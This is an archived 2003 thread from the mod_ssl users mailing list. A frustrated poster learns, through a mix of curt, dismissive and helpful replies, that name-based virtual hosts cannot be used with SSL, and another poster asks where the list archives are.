go dig through the mail list archives to see why name-based virtual 
hosts don't work with SSL.

yes, that's a flippant answer.  no, you're not likely to get a reply 
any more serious.

-dsp

On Wednesday, Aug 20, 2003, at 22:09 US/Eastern, Ian Newlands wrote:

> I am currently running about 15 virtual hosts using name based on port 
> 80, and 1 virtual host using SSL.
>
> My SSL host is currently working with the following:
>
>    
>
> However I want to change this to the IP based hosting for this host, 
> allowing me to then add more SSL based virtual hosts on this setup, so 
> I tried changing this to the following:
>
>    
>
> By doing this my SSL virtual host stops working altogether.
>
> I try the following to debug it on a remote machine:
>
>    # openssl s_client -connect 203.xxx.xxx.xxx:443
>    CONNECTED(00000003)
>    27604:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown 
> protocol:s23_clnt.c:475:
>
> I do the exact same thing on the local machine and it responds with a 
> valid SSL response.
>
> Can anyone suggest might be wrong here?
>
> Regards,
>
> Ian Newlands
>
> _________________________________________________________________
> Hotmail is now available on Australian mobile phones. Go to  
> http://ninemsn.com.au/mobilecentral/signup.asp
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 21 06:05:52 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 14852A8947; Thu, 21 Aug 2003 06:05:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (law10-f83.law10.hotmail.com [64.4.15.83])
	by master.modssl.org (Postfix) with ESMTP id 17877A8933
	for ; Thu, 21 Aug 2003 06:05:50 +0200 (CEST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 20 Aug 2003 21:05:48 -0700
Received: from 203.59.129.168 by lw10fd.law10.hotmail.msn.com with HTTP;
	Thu, 21 Aug 2003 04:05:48 GMT
X-Originating-IP: [203.59.129.168]
X-Originating-Email: [iannewlands@hotmail.com]
From: "Ian Newlands" 
To: modssl-users@modssl.org
Cc: dparis@w3works.com
Date: Thu, 21 Aug 2003 12:05:48 +0800
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 21 Aug 2003 04:05:48.0665 (UTC) FILETIME=[80E4EE90:01C36799]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ian Newlands" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

If I hadn't already exhausted resources I would not have made this post in 
the first place.  I have tried 3 different versions of apache, searched 
through previous postings, used search engines etc. bought 2 books on apache 
and have been attempting to get this going for almost 2 months now.

I'm glad you're amused by my frustration here.

If there is anyone out there that is willing to submit a serious response to 
this I would appreciate it greatly.

Regards,

Ian Newlands


----- Original Message -----
From: "Dave Paris" 
To: 
Cc: "Ian Newlands" 
Sent: Thursday, August 21, 2003 11:58 AM
Subject: Re: virtual hosting


>geeze.  is it that time of the month already for this question?  seems like 
>it was just yesterday when it was asked last .. maybe I'm just thinking of 
>the other 100,000 times it was asked.
>
>in all seriousness, this dead horse has been beaten so many times on this 
>list there isn't even a carcass left to hit at this point.  please go dig 
>through the mail list archives to see why name-based virtual hosts don't 
>work with SSL.
>
>yes, that's a flippant answer.  no, you're not likely to get a reply any 
>more serious.
>
>-dsp
>
>On Wednesday, Aug 20, 2003, at 22:09 US/Eastern, Ian Newlands wrote:
>
> > I am currently running about 15 virtual hosts using name based on port > 
>80, and 1 virtual host using SSL.
> >
> > My SSL host is currently working with the following:
> >
> >    
> >
> > However I want to change this to the IP based hosting for this host, > 
>allowing me to then add more SSL based virtual hosts on this setup, so > I 
>tried changing this to the following:
> >
> >    
> >
> > By doing this my SSL virtual host stops working altogether.
> >
> > I try the following to debug it on a remote machine:
> >
> >    # openssl s_client -connect 203.xxx.xxx.xxx:443
> >    CONNECTED(00000003)
> >    27604:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown > 
>protocol:s23_clnt.c:475:
> >
> > I do the exact same thing on the local machine and it responds with a > 
>valid SSL response.
> >
> > Can anyone suggest might be wrong here?
> >
> > Regards,
> >
> > Ian Newlands
> >
> > _________________________________________________________________
> > Hotmail is now available on Australian mobile phones. Go to  > 
>http://ninemsn.com.au/mobilecentral/signup.asp
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
>
>

_________________________________________________________________
Hot chart ringtones and polyphonics. Go to  
http://ninemsn.com.au/mobilemania/default.asp

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 21 06:28:45 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E7907A8965; Thu, 21 Aug 2003 06:28:44 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wlv.to.gd-es.com (WLV.TO.GD-ES.COM [199.107.242.11])
	by master.modssl.org (Postfix) with ESMTP id 82293A893B
	for ; Thu, 21 Aug 2003 06:28:43 +0200 (CEST)
Received: from HDIS-C3620-A39.CATO.GD-AIS.COM (mcc@HDIS-C3620-A39.CATO.GD-AIS.COM [199.107.247.39])
	by wlv.to.gd-es.com (8.11.6/8.10.1) with ESMTP id h7L4NuD21289;
	Wed, 20 Aug 2003 21:23:56 -0700 (PDT)
Date: Wed, 20 Aug 2003 21:23:54 -0700 (PDT)
From: Merton Campbell Crockett 
X-X-Sender: mcc@SPIELZEUG.MCC-3.CATO.GD-AIS.COM
To: Ian Newlands 
Cc: modssl-users@modssl.org, dparis@w3works.com
Subject: Re: your mail
In-Reply-To: 
Message-ID: 
References: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Merton Campbell Crockett 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Ian:

Look at Netscape's specification for the SSL protocol, RFC 2246 published by
the IETF covering TLS 1.0, or any of a number of books regarding SSL/TLS
that have been published in the last few years.

Basically, the problem is that the entire payload of the TCP/IP packet is
encrypted.  All that is visible is the IP address in the IP header.

Merton Campbell Crockett



On Thu, 21 Aug 2003, Ian Newlands wrote:

> If I hadn't already exhausted resources I would not have made this post in
> the first place.  I have tried 3 different versions of apache, searched
> through previous postings, used search engines etc. bought 2 books on apache
> and have been attempting to get this going for almost 2 months now.
>
> I'm glad you're amused by my frustration here.
>
> If there is anyone out there that is willing to submit a serious response to
> this I would appreciate it greatly.
>
> Regards,
>
> Ian Newlands
>
>
> ----- Original Message -----
> From: "Dave Paris" 
> To: 
> Cc: "Ian Newlands" 
> Sent: Thursday, August 21, 2003 11:58 AM
> Subject: Re: virtual hosting
>
>
> >geeze.  is it that time of the month already for this question?  seems like
> >it was just yesterday when it was asked last .. maybe I'm just thinking of
> >the other 100,000 times it was asked.
> >
> >in all seriousness, this dead horse has been beaten so many times on this
> >list there isn't even a carcass left to hit at this point.  please go dig
> >through the mail list archives to see why name-based virtual hosts don't
> >work with SSL.
> >
> >yes, that's a flippant answer.  no, you're not likely to get a reply any
> >more serious.
> >
> >-dsp
> >
> >On Wednesday, Aug 20, 2003, at 22:09 US/Eastern, Ian Newlands wrote:
> >
> > > I am currently running about 15 virtual hosts using name based on port >
> >80, and 1 virtual host using SSL.
> > >
> > > My SSL host is currently working with the following:
> > >
> > >    
> > >
> > > However I want to change this to the IP based hosting for this host, >
> >allowing me to then add more SSL based virtual hosts on this setup, so > I
> >tried changing this to the following:
> > >
> > >    
> > >
> > > By doing this my SSL virtual host stops working altogether.
> > >
> > > I try the following to debug it on a remote machine:
> > >
> > >    # openssl s_client -connect 203.xxx.xxx.xxx:443
> > >    CONNECTED(00000003)
> > >    27604:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown >
> >protocol:s23_clnt.c:475:
> > >
> > > I do the exact same thing on the local machine and it responds with a >
> >valid SSL response.
> > >
> > > Can anyone suggest might be wrong here?
> > >
> > > Regards,
> > >
> > > Ian Newlands
> > >
> > > _________________________________________________________________
> > > Hotmail is now available on Australian mobile phones. Go to  >
> >http://ninemsn.com.au/mobilecentral/signup.asp
> > >
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> > >
> >
> >
> >
>
> _________________________________________________________________
> Hot chart ringtones and polyphonics. Go to
> http://ninemsn.com.au/mobilemania/default.asp
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

-- 
BEGIN:				vcard
VERSION:			3.0
FN:				Merton Campbell Crockett
ORG:				General Dynamics Advanced Information Systems;
				Intelligence and Exploitation Systems
N:				Crockett;Merton;Campbell
EMAIL;TYPE=internet:		mcc@CATO.GD-AIS.COM
TEL;TYPE=work,voice,msg,pref:	+1(805)497-5045
TEL;TYPE=fax,work:		+1(805)497-5050
TEL;TYPE=cell,voice,msg:	+1(805)377-6762
END:				vcard
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 21 07:58:09 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 15C78A8947; Thu, 21 Aug 2003 07:58:09 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail4.hitachi.co.jp (mail4.hitachi.co.jp [133.145.228.5])
	by master.modssl.org (Postfix) with ESMTP id DB345A8933
	for ; Thu, 21 Aug 2003 07:58:06 +0200 (CEST)
Received: from mc2.mcg.hitachi.co.jp by mail4.hitachi.co.jp (8.9.3p2/3.7W-mail4) id OAA18234; Thu, 21 Aug 2003 14:58:04 +0900 (JST)
Received: (from root@localhost)
	by mc2.mcg.hitachi.co.jp (8.11.6+Sun/8.11.6) id h7L5w2u08557
	for ; Thu, 21 Aug 2003 14:58:02 +0900 (JST)
Received: from unknown [192.168.2.1] by mc2.mcg.hitachi.co.jp with SMTP id QAA08552 ; Thu, 21 Aug 2003 14:58:02 +0900
Received: from navsg4.hitachi.co.jp by navsg4.hitachi.co.jp (8.9.3/3.7W-navsg4) id OAA25032; Thu, 21 Aug 2003 14:58:02 +0900 (JST)
Received: from mlsv5.itg.hitachi.co.jp ([158.213.165.104])
 by navsg4.hitachi.co.jp (NAVGW 2.5.2.17) with SMTP id M2003082114580106694
 ; Thu, 21 Aug 2003 14:58:01 +0900
Received: from navgw14.itg.hitachi.co.jp by mlsv5.itg.hitachi.co.jp (8.12.6/8.12.6) id h7L5veUt016112; Thu, 21 Aug 2003 14:58:01 +0900
Received: from bisdgw.bisd.hitachi.co.jp ([133.144.87.253])
 by navgw14.itg.hitachi.co.jp (SAVSMTP 3.1.1.32) with SMTP id M2003082114580007012
 ; Thu, 21 Aug 2003 14:58:00 +0900
Received: from bisdmail.bisd.hitachi.co.jp
	by bisdgw.bisd.hitachi.co.jp (8.9.3+3.2W/3.7W-bisdgw) with ESMTP id OAA14550;
	Thu, 21 Aug 2003 14:58:01 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Received: from localhost
	by bisdmail.bisd.hitachi.co.jp (8.11.3/3.7W-bisdmail) with ESMTP id h7L5w0676695;
	Thu, 21 Aug 2003 14:58:00 +0900 (JST)
	(envelope-from kiyoshi@bisd.hitachi.co.jp)
Date: Thu, 21 Aug 2003 14:57:21 +0900 (JST)
Message-Id: <20030821.145721.85344921.kiyoshi@bisd.hitachi.co.jp>
To: modssl-users@modssl.org, iannewlands@hotmail.com
Cc: dparis@w3works.com, kiyoshi@bisd.hitachi.co.jp
From: Kiyoshi Watanabe 
In-Reply-To: 
References: 
X-Mailer: Mew version 2.1 on Emacs 20.7 / Mule 4.0 (HANANOEN)
Mime-Version: 1.0
Content-Type: Text/Plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Kiyoshi Watanabe 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Probably you might want to see
http://httpd.apache.org/docs-2.0/ssl/ssl_faq.html#vhosts2

FAQ is the best place to start.

-Kiyoshi
Kiyoshi Watanabe


> If I hadn't already exhausted resources I would not have made this post in 
> the first place.  I have tried 3 different versions of apache, searched 
> through previous postings, used search engines etc. bought 2 books on apache 
> and have been attempting to get this going for almost 2 months now.
> 
> I'm glad you're amused by my frustration here.
> 
> If there is anyone out there that is willing to submit a serious response to 
> this I would appreciate it greatly.
> 
> Regards,
> 
> Ian Newlands
> 
> 
> ----- Original Message -----
> From: "Dave Paris" 
> To: 
> Cc: "Ian Newlands" 
> Sent: Thursday, August 21, 2003 11:58 AM
> Subject: Re: virtual hosting
> 
> 
> >geeze.  is it that time of the month already for this question?  seems like 
> >it was just yesterday when it was asked last .. maybe I'm just thinking of 
> >the other 100,000 times it was asked.
> >
> >in all seriousness, this dead horse has been beaten so many times on this 
> >list there isn't even a carcass left to hit at this point.  please go dig 
> >through the mail list archives to see why name-based virtual hosts don't 
> >work with SSL.
> >
> >yes, that's a flippant answer.  no, you're not likely to get a reply any 
> >more serious.
> >
> >-dsp
> >
> >On Wednesday, Aug 20, 2003, at 22:09 US/Eastern, Ian Newlands wrote:
> >
> > > I am currently running about 15 virtual hosts using name based on port > 
> >80, and 1 virtual host using SSL.
> > >
> > > My SSL host is currently working with the following:
> > >
> > >    
> > >
> > > However I want to change this to the IP based hosting for this host, > 
> >allowing me to then add more SSL based virtual hosts on this setup, so > I 
> >tried changing this to the following:
> > >
> > >    
> > >
> > > By doing this my SSL virtual host stops working altogether.
> > >
> > > I try the following to debug it on a remote machine:
> > >
> > >    # openssl s_client -connect 203.xxx.xxx.xxx:443
> > >    CONNECTED(00000003)
> > >    27604:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown > 
> >protocol:s23_clnt.c:475:
> > >
> > > I do the exact same thing on the local machine and it responds with a > 
> >valid SSL response.
> > >
> > > Can anyone suggest might be wrong here?
> > >
> > > Regards,
> > >
> > > Ian Newlands
> > >
> > > _________________________________________________________________
> > > Hotmail is now available on Australian mobile phones. Go to  > 
> >http://ninemsn.com.au/mobilecentral/signup.asp
> > >
> > > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > > User Support Mailing List                      modssl-users@modssl.org
> > > Automated List Manager                            majordomo@modssl.org
> > >
> >
> >
> >
> 
> _________________________________________________________________
> Hot chart ringtones and polyphonics. Go to  
> http://ninemsn.com.au/mobilemania/default.asp
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 21 11:02:40 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6AB34A8947; Thu, 21 Aug 2003 11:02:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from hanghau.pacific.net.hk (hanghau.pacific.net.hk [202.64.33.137])
	by master.modssl.org (Postfix) with ESMTP id 11970A8933
	for ; Thu, 21 Aug 2003 11:02:38 +0200 (CEST)
Received: from westnet ([202.64.41.172])
        by hanghau.pacific.net.hk with SMTP
        id h7L92ZQ6019974 for ; Thu, 21 Aug 2003 17:02:36 +0800 (CST)
Message-ID: <001301c367c1$84764b80$0200a8c0@com>
From: "Arthur Chan" 
To: 
Subject: howto fossick around in archive
Date: Thu, 21 Aug 2003 16:52:12 +0800
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arthur Chan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hiya.
How does one get to the archive to look around ?


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 21 11:08:53 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9A3DDA8947; Thu, 21 Aug 2003 11:08:53 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id ADA06A8933
	for ; Thu, 21 Aug 2003 11:08:52 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id B3A6E6E401B; Thu, 21 Aug 2003 11:08:46 +0200 (CEST)
Date: Thu, 21 Aug 2003 11:08:46 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: howto fossick around in archive
Message-ID: <20030821090846.GA24848@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <001301c367c1$84764b80$0200a8c0@com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <001301c367c1$84764b80$0200a8c0@com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, Aug 21, 2003 at 04:52:12PM +0800, Arthur Chan wrote:
> Hiya.
> How does one get to the archive to look around ?
> 
As noted on http://www.modssl.org/support/ there is two archives
for the mailing list:

http://marc.theaimsgroup.com/?l=apache-modssl
http://www.mail-archive.com/modssl-users@modssl.org/

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 21 12:13:21 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EB38BA8947; Thu, 21 Aug 2003 12:13:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wink.pobox.com (wink.pobox.com [207.106.49.21])
	by master.modssl.org (Postfix) with ESMTP id ADE9DA8933
	for ; Thu, 21 Aug 2003 12:13:19 +0200 (CEST)
Received: from texas.pobox.com (texas.pobox.com[64.49.223.111])
	by wink.pobox.com (Postfix) with ESMTP id A6257FED2;
	Thu, 21 Aug 2003 06:13:18 -0400 (EDT)
Received: from w3works.com (64-212-200-28.nrp1feld.roc.ny.frontiernet.net [64.212.200.28])
	(using TLSv1 with cipher DES-CBC3-SHA (168/168 bits))
	(No client certificate requested)
	by texas.pobox.com (Postfix) with ESMTP
	id 13E3245356; Thu, 21 Aug 2003 06:13:17 -0400 (EDT)
Date: Thu, 21 Aug 2003 06:13:17 -0400
Subject: Re: 
Content-Type: text/plain; delsp=yes; charset=US-ASCII; format=flowed
Mime-Version: 1.0 (Apple Message framework v552)
Cc: modssl-users@modssl.org
To: "Ian Newlands" 
From: Dave Paris 
In-Reply-To: 
Message-Id: <15656283-D3C0-11D7-B865-000393464F32@w3works.com>
Content-Transfer-Encoding: 7bit
X-Mailer: Apple Mail (2.552)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Ian,

http://www.google.com/search?num=20&hl=en&lr=lang_en&ie=UTF- 
8&safe=off&q=SSL+%22name+based+virtual+hosts%22&spell=1

That's a Google query for:   SSL "name based virtual hosts"

The very first hit is:   
http://httpd.apache.org/docs/vhosts/name-based.html

The summary text presented by Google reads:
"Name-based Virtual Hosts
  ... Name-based virtual hosting cannot be used with SSL secure servers  
because
  of the nature of the SSL protocol. ... Using Name-based Virtual Hosts.  
..."

If you don't like that one, there are 1,890 other matches .. several of  
the first 20 clearly say in the summary text presented by Google that  
you can't do name-based virtual hosts with SSL.

Please note I have not to date, nor am I now, calling you [insert  
derogatory/deriding term or phrase here], nor am I saying you're a  
worthless human.  I'm simply pointing out the obvious fact that the way  
your mind seems to go about solving problems and researching does not  
mesh well with the tasks you're trying to accomplish.  You claim to  
have spent two MONTHS trying to find what I found in under 10 SECONDS.   
That doesn't make me one bit of a better person than you... it just  
says that my mind works in a way that is different from yours.  I'd  
wager there are certain tasks you accomplish quite easily that would  
take me some effort.  It's the way us humans seem to be designed.

Every once in awhile, it's a good thing to look at who we are and what  
we're good at and then review what we've chosen to do in life.  Doing a  
job that meshes well with how you think can be all the difference  
between looking forward to an rewarding day at the office and a bruised  
forehead from repeatedly smashing your head against a wall in  
self-frustration.  [ of course, I'm omitting the forehead bruising  
caused by external influences like PHBs ;-) ]   As for the tone of your  
note .. life's tough, grab a helmet.

Kind Regards,
-dsp

On Thursday, Aug 21, 2003, at 00:05 US/Eastern, Ian Newlands wrote:

> If I hadn't already exhausted resources I would not have made this  
> post in the first place.  I have tried 3 different versions of apache,  
> searched through previous postings, used search engines etc. bought 2  
> books on apache and have been attempting to get this going for almost  
> 2 months now.
>
> I'm glad you're amused by my frustration here.
>
> If there is anyone out there that is willing to submit a serious  
> response to this I would appreciate it greatly.
>
> Regards,
>
> Ian Newlands
>
>
> ----- Original Message -----
> From: "Dave Paris" 
> To: 
> Cc: "Ian Newlands" 
> Sent: Thursday, August 21, 2003 11:58 AM
> Subject: Re: virtual hosting
>
>
>> geeze.  is it that time of the month already for this question?   
>> seems like it was just yesterday when it was asked last .. maybe I'm  
>> just thinking of the other 100,000 times it was asked.
>>
>> in all seriousness, this dead horse has been beaten so many times on  
>> this list there isn't even a carcass left to hit at this point.   
>> please go dig through the mail list archives to see why name-based  
>> virtual hosts don't work with SSL.
>>
>> yes, that's a flippant answer.  no, you're not likely to get a reply  
>> any more serious.
>>
>> -dsp
>>
>> On Wednesday, Aug 20, 2003, at 22:09 US/Eastern, Ian Newlands wrote:
>>
>> > I am currently running about 15 virtual hosts using name based on  
>> port > 80, and 1 virtual host using SSL.
>> >
>> > My SSL host is currently working with the following:
>> >
>> >    
>> >
>> > However I want to change this to the IP based hosting for this  
>> host, > allowing me to then add more SSL based virtual hosts on this  
>> setup, so > I tried changing this to the following:
>> >
>> >    
>> >
>> > By doing this my SSL virtual host stops working altogether.
>> >
>> > I try the following to debug it on a remote machine:
>> >
>> >    # openssl s_client -connect 203.xxx.xxx.xxx:443
>> >    CONNECTED(00000003)
>> >    27604:error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown  
>> > protocol:s23_clnt.c:475:
>> >
>> > I do the exact same thing on the local machine and it responds with  
>> a > valid SSL response.
>> >
>> > Can anyone suggest might be wrong here?
>> >
>> > Regards,
>> >
>> > Ian Newlands
>> >
>> > _________________________________________________________________
>> > Hotmail is now available on Australian mobile phones. Go to  >  
>> http://ninemsn.com.au/mobilecentral/signup.asp
>> >
>> >  
>> ______________________________________________________________________
>> > Apache Interface to OpenSSL (mod_ssl)                    
>> www.modssl.org
>> > User Support Mailing List                       
>> modssl-users@modssl.org
>> > Automated List Manager                             
>> majordomo@modssl.org
>> >
>>
>>
>>
>
> _________________________________________________________________
> Hot chart ringtones and polyphonics. Go to   
> http://ninemsn.com.au/mobilemania/default.asp
>
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug 21 12:36:05 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id A721EA8947; Thu, 21 Aug 2003 12:36:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.blue-cable.net (poseidon.internet-on.tv [62.117.0.13])
	by master.modssl.org (Postfix) with ESMTP id AFEF5A8933
	for ; Thu, 21 Aug 2003 12:36:04 +0200 (CEST)
Envelope-to: modssl-users@modssl.org
Received: from ncc-zwickau.internet-on.tv ([172.16.2.1] helo=blue-cable.net)
	by mail.blue-cable.net with esmtp (Exim 4.20)
	id 19pmnT-0004eM-RO
	for modssl-users@modssl.org; Thu, 21 Aug 2003 12:36:03 +0200
Message-ID: <3F44A093.1000408@blue-cable.net>
Date: Thu, 21 Aug 2003 12:36:03 +0200
From: Hendrik Robbel 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: how to nest SSLRequire
References: <3F4337AB.6050707@blue-cable.net> <20030820090211.GB28381@toftum.dk>
In-Reply-To: <20030820090211.GB28381@toftum.dk>
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-Envelope-From: hendrik.robbel@blue-cable.net
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Hendrik Robbel 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

> 
> Why not just use REQUEST_URI as part of your SSLRequire statement
> instead of wrapping it in 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 14CC8A8947; Thu, 21 Aug 2003 14:43:32 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ns0b.swx.com (ns0b.swx.com [146.109.240.235])
	by master.modssl.org (Postfix) with ESMTP id C3B1BA8933
	for ; Thu, 21 Aug 2003 14:43:30 +0200 (CEST)
Received: from gate0b.unix.swx.ch (gate0b [192.168.252.145])
	by ns0b.swx.com (8.12.9/8.12.9) with ESMTP id h7LChU1U021437
	for ; Thu, 21 Aug 2003 14:43:30 +0200 (MEST)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0b.unix.swx.ch (8.12.9/8.12.9) with ESMTP id h7LChSaK022467
	for ; Thu, 21 Aug 2003 14:43:29 +0200 (MEST)
Content-Class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE:
Date: Thu, 21 Aug 2003 14:43:28 +0200
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Importance: normal
thread-index: AcNnzQJQH+Z9idz5TNeF9kMRYNCtVQAEYs7w
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

>-----Original Message-----
>From: Dave Paris [mailto:dparis@w3works.com]
>
> snip...  You claim to  
>have spent two MONTHS trying to find what I found in under 10 
>SECONDS.

Er... the difference is that you recognised the problem immediately
because you have seen it before. So you knew exactly what to type into
Google.

If you put yourself in Ian's shoes, he was using the NBVH mechanism for
ages and became very familiar with it. He then tried to extend it to
SSL, which is a reasonable thing to do, and then was suprised that it
didn't work. It is not blindingly obvious, a priori, what the problem
is. In that case, it is not so obvious what to type into Google - you
might not necessarily realise that the problem is to do with NBVH,
especially if that is not the only thing you changed.

I am making this comment because I followed a very similar route to Ian
in discovering this SSL limitation. In my case, I was tasked by my boss,
who is a competent programmer, to "set up some NBVHs under SSL". It
never occurred to me that my boss could have handed me an impossible
task and I spent weeks trying to get it to work. In the end, it was this
mailing list which enlightened me.

Since then, I've tried to help out on the list, initially by explaining
this issue whenever it came up but lately (since others also now do this
quite ably), by chipping in whenever some bright spark reckons that he's
found a workaround (it's a bit like debunking perpetual motion machine
designs). Usually, he's forgotten about authentication and is using the
same cert in all VHs...

Anyway, the point I'm making is that the original poster is obviously a
seasoned hacker (he uses openssl from the command line!) and as such
should be welcome on this list and congratulated for using mod_ssl... So
could we be a bit friendlier please?

Rgds,
Owen Boyle
Disclaimer: Any disclaimer attached to this message may be ignored. 





